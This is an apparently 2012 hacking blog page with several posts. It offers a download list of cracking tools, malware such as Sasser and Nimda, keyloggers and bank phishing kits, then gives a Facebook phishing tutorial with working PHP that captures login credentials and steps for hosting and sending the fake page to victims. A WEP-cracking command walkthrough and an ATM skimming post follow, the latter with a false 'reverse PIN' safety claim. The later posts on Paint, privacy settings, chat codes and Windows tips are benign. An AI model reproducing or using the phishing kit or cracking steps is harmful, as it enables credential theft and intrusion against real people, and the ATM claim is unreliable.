Blogger Widgets

Sunday, November 25, 2012

Download Free All Softwares Needed For Hacking And Cracking














- Anon FTP
- Arpinject
- Aspack21
- Atk-2.1
- Bios Pas Remover
- BlasterW32
- Blue
- BMP Ripper
- Brutus
- CASXM138
- CAYZODQF
- CGI Founder v1.043
- CGI Sscan
- Cia10
- Cragle
- Crack Zip
- Davs TR Retail
- Deep Un Freeze
- Dr VBS
- EES Binder
- FTP BR
- Genexe
- Grinder 1.1
- Hack Flash Tempelate
- Hack My Space
- Hack Photoshop CS2
- Hackers Assistant
- Hack the game
- H C K
- HL Boom
- Hotmail Scam Page
- Hydra
- John
- Key Logger
- Legion NetmBios Scanner
- Mail Bomb_2.0 YAHOO
- MIDNITE massacren
- NFO Maker
- Nimda
- Nkedb
- NT Packer
- NTS
- Null Ass Frontend
- P0kes WormGen
- Panther
- Pkp BB pass extractor
- phpBBAttacker
- Pqwak2
- Proxy Pro
- Rainbow crack
- Res Hacker
- Rocket
- RPC
- Rpc scan
- Sasser
- Send Mailer
- Show Pass
- Site Digger
- Smbat- win32bin
- SMB Die
- SMB Proxy
- Sprut
- Stealth- HTTP Scanner
- Super
- TFTPD32
- T Hunter
- Tina soft KILL
- UPD Flood
- Ultra Dos
- Visa Spam
- X Pass
- Yahoo Password
- Zehir
- Addr View
- AOL View
- App To Service
- Astaroth Joiner
- Bank Of America
- Cable Modem Sniffer
- Cap Keys DIGITAL
- C Ports
- C C Generator
- DDL Sites
- eBay
- E Gold.
- E-mail Cracker
- Database Defacer
- F.B.I. Binder
- FTP Brute Forcer
- Fuck Mail Bomber
- PhpBB_exploit_pack
- Google Hacker
- Hook Tool Box
- Hotmail Email Hacker
- Hotmail Hack
- HSBC-US
- Iecv
- IP2
- Ip Net Info
- Key Chenger
- Moore R. Port Scanner
- Msn Flooder
- Msn Account Cracker
- Msn Loader
- NET BIOS Scaner
- Net bios name scanner
- Net Res View
- NO limit cracker
- On-Off MSN
- OS Update Hack
- Pay Pal
- PC Any Pass
- Php Nuke Hacker
- phpBB Annihilator
- phpbb bruteforcer.
- phpBB_DoS
- phpBB_spammer
- phpBBAttacker
- phpBBcracker
- php Bug Scan
- PHP Fucker
- PhpNuke_ bypass
- Ping & Nukes
- Port Listener
- procexp
- Pro Mo
- phpBB Email harvester
- Remote Shut Down
- Server 2003 Keygen
- Server Killer
- Source Checker
- Source codes
- SQL Scan
- Super Scan
- Traceroute
- UC.Forum Spam
- USBank
- Win XP Activator
- Win XP Corperate Keygen
- Who is td
- Warez Sites
- Win Admin pass Hack
- Yahoo Ultra Cracker
- Web Cracker
- Win Xp Key Changer
- Win XP Key Viewer
- XP lizer
- Window Hide
- www Hack
- Win XP KeyGen.


Facebook Phishing Tutorial











Hi every one this post is updated now. The previous one is not clearly explained so i updated with this with the clear method so you can learn the basic of hacking and how this works. Hacking the facebook account password is not that much tough. I will tell you how you can hack but learn this only for educational purpose...







What is Phishing?
Phishing is the technique to get the victims password without Victims knowledge by showing the duplicate log in page.This is the method which used by most of the peoples in earlier time and even now. Actually the process is getting the victims password using the Fake Login page called phisher.

Phishing Process:
Actually hacker need to create the fake login page to get the password of victim. In the Normal Webpage which having the login form. will look like this.




The Duplicate or fake page also look like this only . yea that is the thing we have to make a same page. You can ask what the changes we need to do? Actually we work with the HTML part only the backside of webpage.

If you know the Small knowledge of the HTML means this will be easy one. Any how don't worry i will guide you to make a fake login page of facebook.

Making the Phishing Or Fake page:
Finally we are going to Attack.Here are the simple steps will guide you to make fake page just follow the steps.

Just Go here https://www.facebook.com/login.php and right click on anywhere in the webpage and select View Page Source.
Copy all the codes in the page and paste it on note pad or Note pad ++(recommended) and save it like "Index.Html".
Copy the below Php code and paste it on another note pad. and name it "Fb.php".

<?php
header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”pass.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

And Create a empty new note pad and save it "pass.txt".
Now you having the Three files

Index.html
Fb.php
Pass.txt
Now we are at the working part, Right click on the Index.html file and open it using note pad or note pad ++. Now press The CTRL + F to perform the search operation. Search the Keyword called action=' also you see "method=post" change it into "method=get".
The keyword followed by the URL look like this.

action="www.facebook.com/login.php"

Now you need to change the URL of existing one. Just replace the existing URL with "fb.php" Which we created earlier.This will look like this after the changes.

action="fb.php"
Thats it you are done half of the part. Now you need any free web hosting accounts to upload these files I refer my3gp.com,110mb or any free hosting account which you trusted and also not banned for a long time. if you prefer the paid hosting means that is more than good.
Sign up into my3gb.com and Select the file manger and upload these three files to same directory else this won't work.
Copy the Html file link(Index.html) which uploaded and send it to you friends and tell to sign in and see the magic ( Actually you need to show some social engineering there).
then check the empty text file to get the password.
That's it you are done.

Saturday, November 3, 2012

Hack a wi-fi network














1) First we need to scan for available wireless networks.
Theres this great tool for windows to do this.. called “NetStumbler” or Kismet for Windows and Linux and KisMac for Mac


It’ll also show how the Wi-fi network is secured..
The two most common encryption types are:
1. WEP

2. WAP
WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP i.e Wireless Application Protocol.
WEP have many flaws that allows a hacker to crack a WEP key easily.. whereas

WAP is currently the most secure and best option to secure a wi-fi network..
It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.

Here I’ll tell you how to Crack WEP
To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.
BackTrack have lots of preinstalled softwares for this very purpose..
The tools we will be using on Backtrack are:
Kismet – a wireless network detector
airodump – captures packets from a wireless router
aireplay – forges ARP requests
aircrack – decrypts the WEP keys

1. First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.

2. To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.


3. In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).


4. Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit <ENTER> to get more information about it.

5. The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:
airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]
In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.

6. Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]
In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.

7. Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.

8. Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:
aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs
In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.


Top 3 Ways to Hack ATM | Protection Against ATM Hacking


















ATM hacking is from past is the first interest of every computer hacker.And in this article i will talk about ATM Hacking, things like how ATM Works , What are the vulnerabilities available to exploit and last but not least YES, how to patch them. So starting from the first how ATM works.

Warning:- Hacking ATM is highly illegal. Can Put you into cell for minimum 3 years along with fine 7 lac.This article is just for education purpose only do respect the law in your country, the author of the tutorial do not held any responsibility of the act or trails performed by you after reading the article.

How ATM Works
An ATM is simply a data terminal with two input and four output devices. Like any other data terminal, the ATM has to connect to, and communicate through, a host processor. The host processor is analogous to an nternet Service Provider (ISP) in that it is the gateway through which all the various ATM networks become available to the cardholder (the person wanting the cash).

Most host processors can support either leased-line or dial-up machines. Leased-line machines connect directly to the host processor through a four-wire, point-to-point, dedicated telephone line. Dial-up ATMs connect to the host processor through a normal phone line using a modem and a toll-free number, or through an Internet service provider using a local access number dialed by modem.
Leased-line ATMs are preferred for very high-volume locations because of their thru-put capability, and dial-up ATMs are preferred for retail merchant locations where cost is a greater factor than thru-put. The initial cost for a dial-up machine is less than half that for a leased-line machine. The monthly operating costs for dial-up are only a fraction of the costs for leased-line.
The host processor may be owned by a bank or financial institution, or it may be owned by an independent service provider. Bank-owned processors normally support only bank-owned machines, whereas the independent processors support merchant-owned machines.



Warning:- Hacking ATM is highly illegal. Can Put you into cell for minimum 3 years along with fine 7 lac.This article is just for education purpose only do respect the law in your country, the author of the tutorial do not held any responsibility of the act or trails performed by you after reading the article.
Methods of Hacking ATM



1. Magnetic Reader
Most ATM hackers have a device called Magnetic Reader which they attach over the card slot on the ATM, and as any one pin the card inside automatically it reads the magnetic information. And with the advancement of time the with the help of wireless technology, the magnetic reader automatically transmitted the details to fraudsters in a nearby location.

2. Hidden Camera
Obviously this is one of the easy method to hack an ATM machine but this is something more than hack, here we are not penetrating the ATM. As we all know our ATM is protected by a PIN which acts as our password so if some one have to get money after stealing our card he/she should have the PIN code too, these days criminals have a solution for this too.

3. They enter into the ATM when guard is outside put hand on the ATM cam and silently in 5 or 6 seconds, just install a hidden camera near by the keypad of the ATM from the user enter his/her PIN CODE, and again using the latest technology (wireless) and the PIN is digitally recorded and now hacker have the choice whether he want to get the details remotly or he/she will go to ATM and get the details by himself/herself.

Protection Against ATM Hacking
1. Do Hide the keypad when you enter your PIN CODE.

2. See All around if found any camera which you think not supposed to be there do inform the ATM guard and the near by Bank.

3. DO confirm completeness of the transaction after getting the money most people get trapped into this as the said above in second method.

4. If any criminal caught to and say to extract money from ATM, to save your money just reverse your PIN Account number. Like if my PIN CODE is 1234, if some one having PIN Code like 7777 then just put a 0 (Zero) in the last digit, money will stuck half in the ATM and half outside.
Hope you like the article :)

Warning:- This article is just for education purpose only do respect the law in your country, the author of the tutorial do not held any responsibility of the act or trails performed by you after reading the article.

Wednesday, October 31, 2012

Editing a Photo Using Windows 7 Paint







Thanks to the popularity of social media and sharing sites like Facebook, Twitter, and Instagram, photo editing has become a national obsession. Luckily, you don’t have to spend a fortune on expensive photography software to express your creativity. There are a number of free, easy-to-use ways to edit your pictures. And one of these may already be at your fingertips if you’re using Windows 7.

Windows 7 improved drawing utility – Paint – is a great way to edit your pictures, improve their quality, and add fun effects like colors or text. For those who are new at manipulating their photos, Paint is a great way to learn the ropes.

Begin by clicking on Start from your Windows menu, then select All Programs, followed by Accessories and then Paint. This will get you into the Paint program. In order to find a picture to edit, click on the application icon, and then select Open. (The application icon is the small picture of a document located in the top left corner.)

A window will open up, allowing you to choose a picture file. Simply click on Pictures, and then open the folder that contains the picture you’re looking for. Once you choose a picture, click Open.

Your selected picture will then appear in the open Paint window. From here, you can explore some of the editing tools available. For example, you can add colors from the color palette. Just click on a colored square from the selection on the Home tab. Then choose a tool. Brushes allow you to paint the color on like an artist, while the dropper dabs color in small drops. You can also draw shapes or objects and then use the Fill tool to fill them with color. To add a shape, click on the Shapes button and select a shape. Then click and drag anywhere on your image to draw a rectangle, ellipse, circle, etc.

You can also customize the color palette to get exactly the shade you want. Click on the Edit Colors button. This opens up an area where you can add various colors to get a shade that’s completely unique. Once you’re happy with the look, Click on Add to Custom Colors, followed by Ok to save your new color.

To add a name, phrase, or other text to your picture, click on the Text button. You can then drag the image around to create a text box where you can type. You can also edit this text in the same way you would a Word document – changing the color, size, and font.

Finally, you can modify your photo with the buttons found under the Image section. Here you can re-size your picture, flip it around to create a mirror of itself, stretch your photo out, and more. Once you’re happy with the look, click the Save button to save the changes to your picture. You can also print or email yourself the image.

4 Privacy Tips for Facebook





Computer users have long had a love hate relationship with the internet’s most popular social networking site. There’s nothing like Facebook for staying in touch with friends and family. And yet, many people also struggle with the idea of maintaining their privacy while posting pictures, status updates and other personal information.


Luckily, there are ways you can exercise a degree of control over what people can and can’t access from your Facebook page. Here’s a look at 4 easy tips and tricks for keeping on top of the ever-changing privacy rules of Facebook while still staying social:


1. Determine what your current privacy settings are

To access your Facebook page’s privacy settings, log in to your account. In the top right corner of your home page (or time line) you’ll notice a pull-down menu next to the Home button. Clicking on the Account Settings and Privacy tabs from this menu will give you an overview of your current privacy landscape, and allow you to modify your settings.


2. Control your default privacy settings

Within the Privacy tab, you’ll notice a setting for your default privacy. This is the deciding factor in who is allowed to post to your timeline and who is and isn’t allowed to see your photos and status updates. The Public setting should generally be avoided, as it’s the equivalent of broadcasting your personal information across the web. The Friends setting is usually a much better option, since you have control over who you add to your friends list.


On the Custom setting, you can exclude certain people from being able to comment, or you can create a specified list of people who can access your information.


3. Decide how people can find and contact you

The next section on the Privacy page allows you to control how people connect with you on Facebook. Under the heading How You Connect, you can decide who can look you up by email, who can send you a message, and who is allowed to send you a friend request. You can select from anyone, just those on your friends list, or friends of your friends.


4. Adjust your tagging settings

An often overlooked area of privacy on Facebook falls under the heading of Timeline and Tagging. This is where you can control what happens when your friends tag you or your content, as well as when someone posts on your timeline.


First, you need to decide, from the pull down menu, who is allowed to post on your timeline. (This is also where you can choose to not have anyone post on your timeline at all.) Next, select who can see what others post on your timeline. If you want to be able to review posts that friends tag you in or tags that friends add to your own posts, simply switch the controls for these things from Off to On.

Facebook chat some coolest codes




1. Large Pink Double ( triple ) heart code



[[379320338758329]] [[379320355424994]] [[379320348758328]] [[379320352091661]] [[379320345424995]] [[379320455424984]]
[[379320448758318]] [[379320452091651]] [[379320445424985]] [[379320442091652]] [[379320525424977]] [[379320518758311]]
[[379320512091645]] [[379320522091644]] [[379320515424978]] [[379320602091636]] [[379320612091635]] [[379320605424969]]
[[379320598758303]] [[379320608758302]] [[379320702091626]] [[379320705424959]] [[379320692091627]] [[379320695424960]]
[[379320698758293]] [[379320778758285]] [[379320775424952]] [[379320788758284]] [[379320785424951]] [[379320782091618]]
[[379320872091609]] [[379320875424942]] [[379320865424943]] [[379320862091610]] [[379320868758276]] [[379320945424935]]


2. Mr. Bean



[[255016264574238]] [[255016271240904]] [[255016277907570]]
[[255016267907571]] [[255016274574237]] [[255016384574226]]
[[255016387907559]] [[255016394574225]] [[255016401240891]]
[[255016391240892]] [[255016464574218]] [[255016454574219]]
[[255016457907552]] [[255016461240885]] [[255016451240886]]
[[255016537907544]] [[255016531240878]] [[255016534574211]]
[[255016541240877]] [[255016527907545]] [[255016634574201]]



3. Jack Sparrow



[[298356520217565]] [[298356516884232]] [[298356506884233]] [[298356510217566]]
[[298356513550899]] [[298356620217555]] [[298356606884223]] [[298356616884222]]
[[298356610217556]] [[298356613550889]] [[298356673550883]] [[298356676884216]]
[[298356666884217]] [[298356680217549]] [[298356670217550]] [[298356740217543]]
[[298356733550877]] [[298356743550876]] [[298356730217544]] [[298356736884210]]
[[298356823550868]] [[298356810217536]] [[298356820217535]] [[298356826884201]]
[[298356813550869]] [[298356906884193]] [[298356896884194]] [[298356900217527]]
[[298356903550860]] [[298356893550861]] [[298356950217522]] [[298356946884189]]

4. Superman



[[299528860107644]] [[299528863440977]] [[299528866774310]] [[299528856774311]]
[[299528870107643]] [[299528950107635]] [[299528943440969]] [[299528946774302]]
[[299528953440968]] [[299528956774301]] [[299529013440962]] [[299529016774295]]
[[299529010107629]] [[299529003440963]] [[299529006774296]] [[299529060107624]]
[[299529063440957]] [[299529066774290]] [[299529070107623]] [[299529073440956]]
[[299529173440946]] [[299529183440945]] [[299529180107612]] [[299529176774279]]
[[299529186774278]] [[299529243440939]] [[299529236774273]] [[299529240107606]]

5. Elmo



[[302117289844540]] [[302117283177874]] [[302117276511208]] [[302117279844541]] [[302117286511207]] [[302117366511199]]
[[302117369844532]] [[302117373177865]] [[302117383177864]] [[302117379844531]] [[302117426511193]] [[302117436511192]]
[[302117429844526]] [[302117423177860]] [[302117433177859]] [[302117523177850]] [[302117529844516]] [[302117526511183]]
[[302117536511182]] [[302117533177849]] [[302117606511175]] [[302117596511176]] [[302117599844509]] [[302117593177843]]
[[302117603177842]] [[302117646511171]] [[302117649844504]] [[302117659844503]] [[302117656511170]] [[302117653177837]]
[[302117706511165]] [[302117703177832]] [[302117699844499]] [[302117709844498]] [[302117696511166]] [[302117749844494]]

6. Troll face



[[242538225822042]] [[242538222488709]] [[242538232488708]] [[242538219155376]] [[242538229155375]] [[242538339155364]]
[[242538335822031]] [[242538342488697]] [[242538345822030]] [[242538349155363]] [[242538392488692]] [[242538395822025]]
[[242538399155358]] [[242538402488691]] [[242538405822024]] [[242538475822017]] [[242538472488684]] [[242538489155349]]
[[242538492488682]] [[242538485822016]] [[242538562488675]] [[242538565822008]] [[242538569155341]] [[242538575822007]]
[[242538572488674]] [[242538612488670]] [[242538625822002]] [[242538619155336]] [[242538622488669]] [[242538615822003]]
[[242538675821997]] [[242538682488663]] [[242538672488664]] [[242538679155330]] [[242538685821996]] [[242538742488657]]


7.Mask



[[255006724575192]] [[25500672
7908525]] [[255006737908524]] [[255006734575191]] [[255006731241858]]
[[255006827908515]] [[255006831241848]] [[255006824575182]] [[255006817908516]] [[255006821241849]]
[[255006874575177]] [[255006871241844]] [[255006884575176]] [[255006877908510]] [[255006881241843]]
[[255006934575171]] [[255006931241838]] [[255006941241837]] [[255006944575170]] [[255006937908504]]
[[255007004575164]] [[255007001241831]] [[255006994575165]] [[255006997908498]] [[255006991241832]]
[[255007084575156]] [[255007101241821]] [[255007077908490]] [[255007091241822]] [[255007081241823]]


Friday, October 26, 2012

3 Simple Ways To Speed Up Your Windows Computer




1. Speeding up your Windows PC startup time


You can optimize your computer’s startup speed by launching Run on your Windows computer and typing “msconfig” without the quotes. This will take you to the System Configuration Settings which has five tabs – General, Boot, Services, Startup, and Tools.

Under the General tab, you’ll find 3 startup selections: normal, diagnostic, and selective. During normal startup, all device drivers and services will be loaded by your computer. If this is ticked, it may be the reason why your computer is taking long. Choose either diagnostic or selective startup to speed up the starting time of your Windows computer. Diagnostic startup only loads basic devices and services whereas with selective startup, you can choose to load neither system services nor startup items. After making a selection select “Apply.”

Under the Boot tab, select Advanced options so you can choose the number of processors to facilitate boot speed. If you have a dual-core or quad-core processor, assigning more than one of them to help with the start-up process can significantly boost your computer’s speed. Unfortunately, this optimization tweak is not so efficient on power so if you’re using a laptop, expect some battery drain after startup.

Finally, there’s the Services and Startup tab where you can specifically choose which services and startup items are going to load.


2. Speeding up your Windows Start Menu


The Start Menu is another serious offender as it often takes time to load. Once again you need to open Run but this time, you will type “regedit.exe” to launch the Registry Editor. Go to the HKEY_CURRENT_USER folder and find Control Panel –> Desktop –> MenuShowDelay. Then, double click MenuShowDelay to edit its value. Type in the numbers on the blank and hit “OK.” Remember, the lower the value the faster the Start Menu will load.

Another trick for speeding up your Windows Start Menu would be to limit the number of shortcuts on your desktop. It could be that you just have too many icons on your desktop and that’s what is causing your computer to take long when loading the Start Menu.


3. Speeding up the Right Click Menu


Yet another disappointing slow-down that Windows users experience is the time it takes the Menu to show up when hitting the right click. Installing third-party programs that allow you to remove items from the context menu should speed it up.